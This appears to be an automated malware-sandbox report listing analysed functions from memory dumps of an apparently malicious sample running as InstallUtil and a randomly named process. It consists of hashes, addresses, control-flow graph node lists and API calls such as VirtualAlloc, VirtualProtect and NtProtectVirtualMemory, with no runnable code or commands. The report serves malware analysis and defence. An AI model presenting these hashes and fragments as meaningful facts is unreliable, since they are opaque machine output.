                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 864495295503f716fdf9ea99d9053c993554cb8b7cc05c1e25a61422a7891c38
                                            • Instruction ID: 8cb7c46e986e6ac1b54ebfd4f65a32faadde4e20652d6c9c47db816d02327932
                                            • Opcode Fuzzy Hash: 864495295503f716fdf9ea99d9053c993554cb8b7cc05c1e25a61422a7891c38
                                            • Instruction Fuzzy Hash: F0112530B093148BEF2D6B78D45036E3BA6EB43715F20887AE506DF242DB24CC858BD2
                                            Function 02390848 Relevance: .1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b834ab714d11bec116b303a06936177afb922e27ab95531460d7778e52ac2029
                                            • Instruction ID: df7b4f577ed47182d25b547f9adf3e96049864cbd97ba7e1c5c31f14850bc1f4
                                            • Opcode Fuzzy Hash: b834ab714d11bec116b303a06936177afb922e27ab95531460d7778e52ac2029
                                            • Instruction Fuzzy Hash: 6B11E030B082148FEF68AB78C44072E37A6EB47311F108939E006DF251DB20CC818BD1
                                            Function 022FD3E7 Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1888011894.00000000022FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 022FD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_22fd000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                            • Instruction ID: cdfc93eb3cbf0319fc9985d2b360e78ea30eacca80ed7121ac422f9e308096dd
                                            • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                            • Instruction Fuzzy Hash: 27112276504280CFCB06CF40D9C4B16FF72FB84324F24C6A9D9090B65AC33AE45ACBA2
                                            Function 02391448 Relevance: .1, Instructions: 53COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 42a6d1b422b14372b80d4a8d10a1d4d38c12df49b2e939e5afd1e64d053251d8
                                            • Instruction ID: 44bec3eded485f577067adc5951003a9f229318a1d62b2b23ebab92140fcdfa1
                                            • Opcode Fuzzy Hash: 42a6d1b422b14372b80d4a8d10a1d4d38c12df49b2e939e5afd1e64d053251d8
                                            • Instruction Fuzzy Hash: E9012D31F006168FDF25EFB884502AEBBFAEF4A654F140479D809F7201E735D9418BA1
                                            Function 02399840 Relevance: .0, Instructions: 47COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cc527b5f40309ed4944fbca2e2ab5205e31554eb7ea26bb587950b3c0cb374c1
                                            • Instruction ID: e0245ec9391778092fe09a2f563087ecdf9b1a2b155e9d692866167b926f5e98
                                            • Opcode Fuzzy Hash: cc527b5f40309ed4944fbca2e2ab5205e31554eb7ea26bb587950b3c0cb374c1
                                            • Instruction Fuzzy Hash: DD01B531A002048FDB14DF99D88478ABBE6FF81311F64C564D90C5B299EB70AD45CBA1
                                            Function 02397038 Relevance: .0, Instructions: 40COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3f951c946e709151763715197ac90fafc1f64ec79fa315b1b13e5c36956c872b
                                            • Instruction ID: 14ed3e17f5eb9db5e10e7303d31d8ac903f089cb4b9b4d9bd72b08573b451eeb
                                            • Opcode Fuzzy Hash: 3f951c946e709151763715197ac90fafc1f64ec79fa315b1b13e5c36956c872b
                                            • Instruction Fuzzy Hash: 60010439B00104CFCB14EB78D59896DBBF2EF88216B1140A9E50ADB3A4CF34ED42CB41
                                            Function 023980A9 Relevance: .0, Instructions: 37COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2a7b5104ac02b9de3108130b284ceb46f6ec01c85ec75977f07e9225ce58075f
                                            • Instruction ID: f9c6c35a797085b698aeaa9aaf0e410f7f746131a30f364f5c217dc705b13aae
                                            • Opcode Fuzzy Hash: 2a7b5104ac02b9de3108130b284ceb46f6ec01c85ec75977f07e9225ce58075f
                                            • Instruction Fuzzy Hash: 0601A7749003959FCB12E7A8E950D9C7F71DF41345B4016B8C0096B2BADF302E4BDB52
                                            Function 023980B8 Relevance: .0, Instructions: 33COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.1890464492.0000000002390000.00000040.00000800.00020000.00000000.sdmp, Offset: 02390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_2390000_InstallUtil.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7a8cc7282149cf5309c6ad78aa470058e297251352a0464fa339806d0136be81
                                            • Instruction ID: 41618a7fd20f857352a444fed744be98900f9e18e2de20cf5052bb30e3526c75
                                            • Opcode Fuzzy Hash: 7a8cc7282149cf5309c6ad78aa470058e297251352a0464fa339806d0136be81
                                            • Instruction Fuzzy Hash: 2BF04474A01219AFCB41FBA8F940D9D7BB5EB40305F505578C008A7268EF302E4A9B91

                                            Execution Graph

                                            Execution Coverage:15%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:26
                                            Total number of Limit Nodes:0
                                            execution_graph 51303 2f01b50 51304 2f01b6d 51303->51304 51305 2f01b7d 51304->51305 51307 2f07952 51304->51307 51311 6431803 51307->51311 51315 6431810 51307->51315 51308 2f028bd 51312 6431810 51311->51312 51319 6431850 51312->51319 51316 6431825 51315->51316 51318 6431850 2 API calls 51316->51318 51317 643183d 51317->51308 51318->51317 51321 6431887 51319->51321 51320 643183d 51320->51308 51324 6431960 51321->51324 51328 6431968 51321->51328 51325 6431968 VirtualAlloc 51324->51325 51327 6431a19 51325->51327 51327->51320 51329 64319ac VirtualAlloc 51328->51329 51331 6431a19 51329->51331 51331->51320 51332 64307a0 51333 64307e9 VirtualProtect 51332->51333 51335 6430856 51333->51335 51299 676d420 51300 676d46f NtProtectVirtualMemory 51299->51300 51302 676d4e7 51300->51302

                                            Executed Functions

                                            Function 067496F8 Relevance: .3, Instructions: 328COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1917366551.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6740000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1d61a89c21ba22fb7e28e826b3b98dcdda74098d2da92c4f15324252dd902e48
                                            • Instruction ID: 4e6f29cbccfcc652c9403231f4e00ac279020bb6871912ce3a39aa78fd941def
                                            • Opcode Fuzzy Hash: 1d61a89c21ba22fb7e28e826b3b98dcdda74098d2da92c4f15324252dd902e48
                                            • Instruction Fuzzy Hash: E3E13574E08208CFDB91DFA8D848BAEBBF2FB49300F10816AD919A7351C7399945CF94
                                            Function 06749708 Relevance: .3, Instructions: 298COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1917366551.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6740000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5b24a5540fe6387373db3c9e3ed17e4195ceb2db0616085b728476e03cc655a2
                                            • Instruction ID: a86941022878c9d73566c9bd26d9b2ad6f8d725b073fbf57e30a0f97c2c5597a
                                            • Opcode Fuzzy Hash: 5b24a5540fe6387373db3c9e3ed17e4195ceb2db0616085b728476e03cc655a2
                                            • Instruction Fuzzy Hash: F6D10374E04218CFDB94DFA9D858BAEBBF1FB49300F10816AD91AA7350C7399985CF84
                                            Function 02F02728 Relevance: .1, Instructions: 135COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1887187318.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_2f00000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3ff3d2458b52813b66afe971e091aaa42350b06f6566706644a773dca7944ffa
                                            • Instruction ID: dccb0f3283f51b255e934f992ff72f3436eec9881dec8d1f927e0bd8ffee4a3f
                                            • Opcode Fuzzy Hash: 3ff3d2458b52813b66afe971e091aaa42350b06f6566706644a773dca7944ffa
                                            • Instruction Fuzzy Hash: 455148B5D016688BEB68CF678D547DAFAF3AFC9304F14C0EA994CA6254DB700AC58F11
                                            Function 06460168 Relevance: 4.3, Strings: 2, Instructions: 1777COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1916311821.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6460000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q
                                            • API String ID: 0-2697143702
                                            • Opcode ID: 40dbfc6e2643b7bbcecfbb089842a22816c9dbeb8454572d7f526813e91abcc1
                                            • Instruction ID: c193b63c589c99bd21fa7a230786d88b7ebb28fd725550f7165985238a6a894c
                                            • Opcode Fuzzy Hash: 40dbfc6e2643b7bbcecfbb089842a22816c9dbeb8454572d7f526813e91abcc1
                                            • Instruction Fuzzy Hash: 57E2A070909389DFDB16DBA9CC58BAE7FB5AF06300F14409BF541AB2A2C7745C45CBA2
                                            Function 06431960 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 96memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1604 6431960-6431a17 VirtualAlloc 1608 6431a20-6431a68 1604->1608 1609 6431a19-6431a1f 1604->1609 1609->1608
                                            APIs
                                            • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 06431A07
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1916142079.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6430000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID: @
                                            • API String ID: 4275171209-2766056989
                                            • Opcode ID: c7411c977b3f1128cd412a4e806a3529f53e4fa8d63c5ef38e91587193e8b674
                                            • Instruction ID: 3041381bae3ec514f09ad6a8f92da504a5acf579ab9a1ada6907988c89faebba
                                            • Opcode Fuzzy Hash: c7411c977b3f1128cd412a4e806a3529f53e4fa8d63c5ef38e91587193e8b674
                                            • Instruction Fuzzy Hash: 5031A7B8D042589FCF10CFA9D884ADEFBB1FB49310F20902AE819B7250D735A945CF98
                                            Function 064618C0 Relevance: 2.9, Strings: 2, Instructions: 362COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1837 64618c0-64618e8 1838 64618ef-6461918 1837->1838 1839 64618ea 1837->1839 1840 646191a-6461923 1838->1840 1841 6461939 1838->1841 1839->1838 1842 6461925-6461928 1840->1842 1843 646192a-646192d 1840->1843 1844 646193c-6461940 1841->1844 1845 6461937 1842->1845 1843->1845 1846 6461cf7-6461d0e 1844->1846 1845->1844 1848 6461d14-6461d18 1846->1848 1849 6461945-6461949 1846->1849 1850 6461d4d-6461d51 1848->1850 1851 6461d1a-6461d4a 1848->1851 1852 646194e-6461952 1849->1852 1853 646194b-64619a8 1849->1853 1857 6461d72 1850->1857 1858 6461d53-6461d5c 1850->1858 1851->1850 1855 6461954-6461961 1852->1855 1856 646197b-646199f 1852->1856 1861 64619ad-64619b1 1853->1861 1862 64619aa-6461a1b 1853->1862 1874 646196a-6461978 1855->1874 1856->1846 1859 6461d75-6461d7b 1857->1859 1863 6461d63-6461d66 1858->1863 1864 6461d5e-6461d61 1858->1864 1867 64619b3-64619d7 1861->1867 1868 64619da-6461a01 1861->1868 1872 6461a20-6461a24 1862->1872 1873 6461a1d-6461a7a 1862->1873 1870 6461d70 1863->1870 1864->1870 1867->1868 1892 6461a03-6461a09 1868->1892 1893 6461a11-6461a12 1868->1893 1870->1859 1878 6461a26-6461a4a 1872->1878 1879 6461a4d-6461a71 1872->1879 1881 6461a7f-6461a83 1873->1881 1882 6461a7c-6461ad8 1873->1882 1874->1856 1878->1879 1879->1846 1888 6461a85-6461aa9 1881->1888 1889 6461aac-6461acf 1881->1889 1894 6461add-6461ae1 1882->1894 1895 6461ada-6461b3c 1882->1895 1888->1889 1889->1846 1892->1893 1893->1846 1901 6461ae3-6461b07 1894->1901 1902 6461b0a-6461b22 1894->1902 1904 6461b41-6461b45 1895->1904 1905 6461b3e-6461ba0 1895->1905 1901->1902 1914 6461b24-6461b2a 1902->1914 1915 6461b32-6461b33 1902->1915 1911 6461b47-6461b6b 1904->1911 1912 6461b6e-6461b86 1904->1912 1916 6461ba5-6461ba9 1905->1916 1917 6461ba2-6461c04 1905->1917 1911->1912 1925 6461b96-6461b97 1912->1925 1926 6461b88-6461b8e 1912->1926 1914->1915 1915->1846 1921 6461bd2-6461bea 1916->1921 1922 6461bab-6461bcf 1916->1922 1927 6461c06-6461c68 1917->1927 1928 6461c09-6461c0d 1917->1928 1936 6461bec-6461bf2 1921->1936 1937 6461bfa-6461bfb 1921->1937 1922->1921 1925->1846 1926->1925 1938 6461c6d-6461c71 1927->1938 1939 6461c6a-6461cc3 1927->1939 1932 6461c36-6461c4e 1928->1932 1933 6461c0f-6461c33 1928->1933 1947 6461c50-6461c56 1932->1947 1948 6461c5e-6461c5f 1932->1948 1933->1932 1936->1937 1937->1846 1943 6461c73-6461c97 1938->1943 1944 6461c9a-6461cbd 1938->1944 1949 6461cc5-6461ce9 1939->1949 1950 6461cec-6461cef 1939->1950 1943->1944 1944->1846 1947->1948 1948->1846 1949->1950 1950->1846
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1916311821.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6460000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q
                                            • API String ID: 0-2697143702
                                            • Opcode ID: eb2c489f09195576fbba377c6234a53359bb60b157278fbcb975a39586ffc5e5
                                            • Instruction ID: b7604ef65786f2c015526dc1198fac2ee15053c7d472ea1a2c25c4417391d03d
                                            • Opcode Fuzzy Hash: eb2c489f09195576fbba377c6234a53359bb60b157278fbcb975a39586ffc5e5
                                            • Instruction Fuzzy Hash: E2F1F834E0121CDFDB99EFA9D5886ADBBB2FF49315F10412AE406AB350CB315985CF81
                                            Function 02F03EC8 Relevance: 2.7, Strings: 2, Instructions: 238COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2050 2f03ec8 2051 2f0410c-2f04125 2050->2051 2053 2f04137-2f04150 2051->2053 2054 2f04127-2f04132 2051->2054 2069 2f04152-2f0415e 2053->2069 2070 2f0417a 2053->2070 2055 2f03ed9-2f03ee2 2054->2055 2056 2f03ee4 2055->2056 2057 2f03eeb-2f03eec 2055->2057 2056->2051 2056->2053 2056->2057 2059 2f042c0-2f042d4 2056->2059 2060 2f03f62-2f03f63 2056->2060 2061 2f040c4-2f04107 2056->2061 2062 2f041c5-2f04208 2056->2062 2063 2f03f68-2f03f87 2056->2063 2064 2f03f4b-2f03f5d 2056->2064 2065 2f040ab-2f040bf 2056->2065 2066 2f03fcc 2056->2066 2067 2f0424d-2f042ac 2056->2067 2068 2f03eee-2f03f0d 2056->2068 2057->2068 2071 2f042d6-2f04315 2059->2071 2060->2051 2061->2055 2062->2066 2105 2f0420e-2f04237 2062->2105 2063->2051 2084 2f03f8d-2f03fb6 2063->2084 2064->2055 2065->2071 2080 2f03fd8-2f040a6 2066->2080 2067->2055 2104 2f042b2-2f042bb 2067->2104 2068->2051 2086 2f03f13-2f03f3c 2068->2086 2074 2f04160-2f04166 2069->2074 2075 2f04168-2f0416e 2069->2075 2073 2f04180-2f041af 2070->2073 2095 2f04324-2f0432d 2071->2095 2096 2f04317-2f04322 2071->2096 2073->2055 2089 2f041b5-2f041c0 2073->2089 2082 2f04178 2074->2082 2075->2082 2080->2055 2082->2073 2084->2055 2100 2f03fbc-2f03fc7 2084->2100 2086->2055 2098 2f03f3e-2f03f49 2086->2098 2089->2055 2102 2f04336-2f04337 2095->2102 2103 2f0432f 2095->2103 2096->2095 2098->2055 2100->2055 2109 2f0437d-2f0437e 2102->2109 2103->2102 2106 2f04380-2f04387 2103->2106 2107 2f043c4 2103->2107 2108 2f04339-2f0436e 2103->2108 2103->2109 2104->2055 2105->2055 2113 2f0423d-2f04248 2105->2113 2106->2108 2112 2f04389-2f043b0 2106->2112 2108->2095 2120 2f04370-2f0437b 2108->2120 2109->2107 2112->2095 2119 2f043b6-2f043bf 2112->2119 2113->2055 2119->2095 2120->2095
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1887187318.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_2f00000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: PH^q$`Q^q
                                            • API String ID: 0-3163867966
                                            • Opcode ID: 08bfb9da5df5e91d06b3bc19be4f82e65363ef2fb85dcdc2bdd42ab2d0b4d63d
                                            • Instruction ID: c215752e6777bc3c78037247dc58e7eeb489717c1c6d19f3492bf16ce4bd7a54
                                            • Opcode Fuzzy Hash: 08bfb9da5df5e91d06b3bc19be4f82e65363ef2fb85dcdc2bdd42ab2d0b4d63d
                                            • Instruction Fuzzy Hash: 5BC1A274E01229CFEB649F24D9887A9B7F1BB48341F1491DAD68AA3280DB751EC4DF81
                                            Function 0674A197 Relevance: 2.5, Strings: 2, Instructions: 49COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2268 674a197-674a1ef 2282 674a1f2 call 676eb90 2268->2282 2283 674a1f2 call 676eb88 2268->2283 2271 674a1f4-674a201 2272 674a207-674a229 2271->2272 2273 674b231-674b26a 2271->2273 2274 674a0f2-674a0fb 2272->2274 2275 674a22f-674a23a 2272->2275 2273->2274 2279 674b270-674b27b 2273->2279 2277 674a104-674afea 2274->2277 2278 674a0fd 2274->2278 2275->2274 2277->2274 2278->2277 2279->2274 2282->2271 2283->2271
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1917366551.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6740000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $5
                                            • API String ID: 0-1616362103
                                            • Opcode ID: 1bac798d3c3879ba028d084433c4e7a4c3458585b441c1ba9560302fc225e29c
                                            • Instruction ID: e2443aff4e427ea8869d8941f5484b9996184ccb6eb960e575a147a81814a558
                                            • Opcode Fuzzy Hash: 1bac798d3c3879ba028d084433c4e7a4c3458585b441c1ba9560302fc225e29c
                                            • Instruction Fuzzy Hash: 8721BDB494022ACFEBA1DF18C988BA8BBB5EB09304F1080E9D519A7251D7769E85CF00
                                            Function 0674A700 Relevance: 2.5, Strings: 2, Instructions: 44COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2284 674a700-674a761 2297 674a764 call 676eb90 2284->2297 2298 674a764 call 676eb88 2284->2298 2287 674a766-674a773 2288 674a779-674a798 2287->2288 2289 674b20a-674b22c 2287->2289 2290 674a0f2-674a0fb 2288->2290 2291 674a79e-674a7a9 2288->2291 2293 674a104-674afea 2290->2293 2294 674a0fd 2290->2294 2291->2290 2293->2290 2294->2293 2297->2287 2298->2287
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1917366551.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6740000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 1$=
                                            • API String ID: 0-1936259842
                                            • Opcode ID: 9443306ea43aecc940814ef059f2216f3e5774b149fbc0a32f11992a24bf20d9
                                            • Instruction ID: be91cea60c259dc43d593936c5fd8e5ec72769fa5d7f435170c20b1a8d1614e3
                                            • Opcode Fuzzy Hash: 9443306ea43aecc940814ef059f2216f3e5774b149fbc0a32f11992a24bf20d9
                                            • Instruction Fuzzy Hash: EB21A274940268CFDBA0DF58C888BD8BBB5EB09304F1085EAD449A7261DB769EC2CF50
                                            Function 0674AAE1 Relevance: 2.5, Strings: 2, Instructions: 43COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1917366551.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6740000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2$8
                                            • API String ID: 0-21279188
                                            • Opcode ID: c3dc62c4b2ae551638cb76c3f333506c2d1a4c73a057c0a8e9dfa7f57e3effd7
                                            • Instruction ID: 73f7e73878f04a9ad95a88b7e3f539ede148c6465f9825cf3df7ef8abf2ec998
                                            • Opcode Fuzzy Hash: c3dc62c4b2ae551638cb76c3f333506c2d1a4c73a057c0a8e9dfa7f57e3effd7
                                            • Instruction Fuzzy Hash: 4521B074941668CFDBA0DF58C888B9CBBB1EB48305F1084EAE509BB354D77A9E85CF10
                                            Function 0674A401 Relevance: 2.5, Strings: 2, Instructions: 39COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1917366551.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6740000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2$8
                                            • API String ID: 0-21279188
                                            • Opcode ID: e8a8980889db4688020b102a3b5bfabb014490f8a5ffb930eb808f004a551f10
                                            • Instruction ID: e1b61b79655ed6f4ce84cb96e42bd7db2b03c456c6c9272a74e4a0e3a9ac7928
                                            • Opcode Fuzzy Hash: e8a8980889db4688020b102a3b5bfabb014490f8a5ffb930eb808f004a551f10
                                            • Instruction Fuzzy Hash: 98119D74A01669DFDBA4DF58D988B9CB7B1BB88300F1084EAA509BB354DB365E85CF00
                                            Function 068F6DD2 Relevance: 2.5, Strings: 2, Instructions: 37COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1917936459.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_68f0000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %$g
                                            • API String ID: 0-3824764996
                                            • Opcode ID: c577449984c07383629e372200f3d1d0ba0d6a133f83358b7b318d86c6d80d12
                                            • Instruction ID: c68623c75ae32adbe7adb8d9872ef2097632362ed415dd17a72f92e19e48e517
                                            • Opcode Fuzzy Hash: c577449984c07383629e372200f3d1d0ba0d6a133f83358b7b318d86c6d80d12
                                            • Instruction Fuzzy Hash: 1311E07490812ACFEBA4DF28D998AD9B7F6FB48301F1040A8E61DA3740DA349E85CF01
                                            Function 0674A2DE Relevance: 2.5, Strings: 2, Instructions: 23COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1917366551.0000000006740000.00000040.00000800.00020000.00000000.sdmp, Offset: 06740000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6740000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: &$;
                                            • API String ID: 0-2204298178
                                            • Opcode ID: 7adaa2e5462c1592b6d57f50dd80a69819109b2dcbbbbfdefe561bfac0e0293c
                                            • Instruction ID: 7d1811e5ef4e9d9874df9e7150f4a608dd89aafa25a8a85612d3e675d383aa53
                                            • Opcode Fuzzy Hash: 7adaa2e5462c1592b6d57f50dd80a69819109b2dcbbbbfdefe561bfac0e0293c
                                            • Instruction Fuzzy Hash: 5BF0AF74901229CFDBA0DF19C988BD8BBF1EB08354F5084E9D04AA7251D37A9E96CF04
                                            Function 06430799 Relevance: 1.6, APIs: 1, Instructions: 100memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06430844
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1916142079.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6430000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: c3c214155e305096a6b79d31fa70e19c5a185f43048535cc5b47c8b8617d6423
                                            • Instruction ID: 359f0c29aa93caf1f627a109b84dc71bf08b527f9c19d1c6415a241204a7b119
                                            • Opcode Fuzzy Hash: c3c214155e305096a6b79d31fa70e19c5a185f43048535cc5b47c8b8617d6423
                                            • Instruction Fuzzy Hash: 9D31B8B4D012589FCB14CFA9D980ADEFBB1BB49310F20942AE858B7210D735A945CF94
                                            Function 064307A0 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06430844
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1916142079.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6430000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual
                                            • String ID:
                                            • API String ID: 544645111-0
                                            • Opcode ID: 1349653d67917faaf448515fcda66e442447fe080e33e0a5390d74c6984263cb
                                            • Instruction ID: da5862b9cb761f12dc767f6fd27188df7bc32c143cb607f1d4ecadc4b3810088
                                            • Opcode Fuzzy Hash: 1349653d67917faaf448515fcda66e442447fe080e33e0a5390d74c6984263cb
                                            • Instruction Fuzzy Hash: 5B3196B8D012589FCF14DFA9D984ADEFBB1BB49310F20942AE819B7310D735A945CF98
                                            Function 06431968 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 06431A07
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.1916142079.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_6430000_Afoagcjtqvi.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: b0d5429cda441c8c19c5d04bed7fedaffda1deda0cfb28f956bc0af9cbb5d00b
                                            • Instruction ID: 83e3b705677d0985f04bdff8180cfb6d27e75fcfed83d34b1360bd245b9ed443
                                            • Opcode Fuzzy Hash: b0d5429cda441c8c19c5d04bed7fedaffda1deda0cfb28f956bc0af9cbb5d00b
